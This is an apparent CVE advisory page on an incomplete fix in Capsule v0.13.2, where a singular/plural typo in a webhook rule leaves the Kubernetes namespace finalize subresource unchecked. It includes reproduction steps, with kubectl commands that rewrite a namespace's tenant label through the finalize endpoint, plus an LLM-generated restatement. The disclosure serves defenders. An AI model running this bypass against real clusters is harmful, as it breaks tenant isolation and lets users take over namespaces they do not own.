Capsule: Incomplete fix of CVE-2026-30963: singular/plural typo leaves namespaces/finalize unprotected
Description
Summary
Capsule v0.13.2 webhook rules contain namespace/finalize (singular) instead of namespaces/finalize (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.
Details
PUT to /api/v1/namespaces//finalize has resource=namespaces (plural). The singular rule never matches. matchPolicy: Equivalent does not compensate.
PoC
Confirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): kubectl label --as=alice = DENIED (control). kubectl replace --raw /finalize --as=alice = 200 OK (bypass). Tenant label changed.
Impact
Namespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: namespace/finalize -> namespaces/finalize. The CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but charts/capsule/templates/configuration.yaml line 105 contains a singular/plural typo: namespace/finalize instead of namespaces/finalize. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.
Details
In Kubernetes admission webhooks, rules.resources matches against the plural resource name. A PUT to /api/v1/namespaces//finalize has resource=namespaces (plural). The rule namespace/finalize (singular) never matches any real API request.
The matchPolicy: Equivalent setting does NOT compensate (it handles API group/version variations, not resource name typos).
PoC
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart): ``bash # Setup: alice with namespaces/finalize RBAC kubectl apply -f - < /tmp/ns.json # modify tenant label to "hijacked" kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice # 200 OK - tenant label changed ``
Impact
Namespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: namespace/finalize -> namespaces/finalize.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2Patches
Vulnerability mechanics
Root cause
"Singular/plural typo in webhook rule: `namespace/finalize` instead of `namespaces/finalize` causes the finalize subresource admission check to never match any real API request."
Attack vector
An attacker who has RBAC permissions to update the `namespaces/finalize` subresource (but not to directly label namespaces) can bypass the Capsule admission webhook. A PUT request to `/api/v1/namespaces/<ns>/finalize` uses the plural resource `namespaces`, but the webhook rule mistakenly matches on the singular `namespace/finalize`, so the webhook is never invoked [ref_id=1]. The `matchPolicy: Equivalent` setting does not compensate because it only handles API group/version variations, not resource name typos [ref_id=1]. The attacker can modify the tenant label on a namespace via the finalize endpoint, achieving the same tenant-label hijack that CVE-2026-30963 was meant to prevent [ref_id=1].
Affected code
The vulnerability is in `charts/capsule/templates/configuration.yaml` at line 105, where the webhook rule lists `namespace/finalize` (singular) instead of `namespaces/finalize` (plural) [ref_id=1]. This rule is part of the namespace validating webhook's subresource entries added by the CVE-2026-30963 fix [ref_id=1]. No patch file is provided in the bundle; the advisory identifies this single line as the defect.
What the fix does
No patch diff is included in the bundle. The advisory states the fix is a one-character change: replace `namespace/finalize` with `namespaces/finalize` in `charts/capsule/templates/configuration.yaml` line 105 [ref_id=1]. This corrects the webhook rule to match the plural resource name that Kubernetes uses for the finalize subresource, restoring the admission webhook defense that was intended by the CVE-2026-30963 fix [ref_id=1].
Preconditions
- authAttacker must have RBAC permissions to update the namespaces/finalize subresource (e.g., via a ClusterRole with resources: ['namespaces/finalize'] and verbs: ['update'])
- configCapsule v0.13.2 must be deployed with the Helm chart containing the singular/plural typo in the webhook configuration
- networkAttacker must have network access to the Kubernetes API server
- inputAttacker must supply a modified namespace JSON with a changed tenant label via the finalize endpoint
Reproduction
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart) [ref_id=1]. Setup: create a user `alice` with a ClusterRole granting `resources: ["namespaces/finalize"]` with `verbs: ["update"]` and `resources: ["namespaces"]` with `verbs: ["get", "list"]`, then bind via ClusterRoleBinding [ref_id=1]. Control test: `kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice` is denied by the webhook [ref_id=1]. Bypass: `kubectl get namespace oil-prod -o json > /tmp/ns.json`, modify the tenant label to "hijacked", then `kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice` returns 200 OK and the tenant label is changed without the webhook being invoked [ref_id=1].
Generated on Jun 17, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.